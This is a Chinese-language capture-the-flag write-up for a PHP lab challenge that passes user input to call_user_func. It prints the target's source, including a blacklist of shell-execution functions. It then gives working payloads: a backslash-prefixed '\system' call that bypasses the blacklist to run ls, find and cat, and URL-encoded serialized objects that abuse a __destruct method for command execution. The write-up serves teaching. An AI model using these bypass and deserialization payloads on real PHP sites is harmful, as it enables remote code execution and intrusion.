目录
知识点:
1)黑名单取巧绕过
2)PHP的file_get_contents函数使用
3)PHP序列化与反序列化构造
访问靶机,观察页面,开始时首先加载了一张图片,随后刷新回显时间,并且网页每隔一段时间会刷新一次,频率大概五秒一次
F12查看源码,和观察的一样,setTimeout("document.form1.submit()",5000)每隔五秒钟将会提交一次form1,然后是一串时间字符串2021-10-20 12:14:50 pm
注意:重点是靶机内的form1表单,index.php用post方式提交了两个参数,func和p。func的值为date,p值Y-m-d h:i:s a
分析:接收到func和p,执行PHP内的date函数和格式化的Y-m-d h:i:s a,然后输出结果。既然这样,猜想一下在PHP内,执行$func="date",肯定是没有问题的,但是如果提交的不是date,而是system,或exec呢?
不妨用php内的md5函数测试一下,123经过md5加密后的值为202cb962ac59075b964b07152d234b70,如果成功执行回显在网页上,猜测就正确
构造测试paylaod:?func=md5&p=123
做个代码执行?被拦截了,可以fuzz查看哪些函数被黑名单
这里可以利用file_get_contents获取index.php的源码,如下:
file_get_contents(path):读取path路径下文件的内容
果然定义了一个disable_fun,然后巴拉巴拉一堆黑名单,代码审计
<?php
$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
function gettime($func, $p) {
$result = call_user_func($func, $p);//调调用传递函数,并返回函数运行的结果(本例中即为执行$func($p))
$a= gettype($result);
if ($a == "string") {
return $result;
} else {return "";}
}
class Test {
var $p = "Y-m-d h:i:s a";
var $func = "date";
function __destruct() {
if ($this->func != "") {
echo gettime($this->func, $this->p);
}
}
}
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];
if ($func != null) {//非空
$func = strtolower($func);//转小写
if (!in_array($func,$disable_fun)) {//判断是否存在黑名单
echo gettime($func, $p);//如果不存在则调用gettime,把funchep传入
}else {
die("Hacker...");//报错
}
}
?>
这里有两种解法,一种是像大部分wp一样构造序列化得flag,出题人大概也是这个意图,另外一种解法比较巧取
方法一:
首先判断是否存在与黑名单,php内的" \ "在做代码执行的时候,会识别特殊字符串,绕过黑名单
payload:?func=\system&p=ls /
常用命令:
system('ls') : 列举当前目录下的所有文件
system("find / -name flag"):查找所有文件名匹配flag的文件
payload:?func=\system&p=find / -name flag*
payload:?func=\system&p=cat /tmp/flagoefiu4r93
方法二:
这种方法就是大部分答案写的反序列化得flag手段
首先看下刚才index.php源码内的一串代码
class Test {
var $p = "Y-m-d h:i:s a";//定义p和func
var $func = "date";
function __destruct() {//对象被创建时自动调用
if ($this->func != "") {
echo gettime($this->func, $this->p);
}
}
如果用反序列化的方式调用system呢,提交的func为unserialize,p为序列化后的字符串,然后反序列化test类
<?php
class Test{
public $func;
public $p;
}
$ganyu=new Test();
$ganyu->func="system";
$ganyu->p="ls -alh /";
echo urlencode(serialize($ganyu));
?>
构造查看根目录的payload,由于以p提交的为序列化内容,func需设置为unserialize:
?func=unserialize&p=O%3A4%3A%22Test%22%3A2%3A%7Bs%3A4%3A%22func%22%3Bs%3A6%3A%22system%22%3Bs%3A1%3A%22p%22%3Bs%3A9%3A%22ls+-alh+%2F%22%3B%7D
然后就是构造查找flag文件的payload
<?php
class Test{
public $func;
public $p;
}
$ganyu=new Test();
$ganyu->func="system";
$ganyu->p="find / -name flag*";
echo urlencode(serialize($ganyu));
?>
最后构造查询flag的payload得到flag
<?php
class Test{
public $func;
public $p;
}
$ganyu=new Test();
$ganyu->func="system";
$ganyu->p="cat /tmp/flagoefiu4r93";
echo urlencode(serialize($ganyu));
?>
?func=unserialize&p=O%3A4%3A%22Test%22%3A2%3A%7Bs%3A4%3A%22func%22%3Bs%3A6%3A%22system%22%3Bs%3A1%3A%22p%22%3Bs%3A22%3A%22cat+%2Ftmp%2Fflagoefiu4r93%22%3B%7D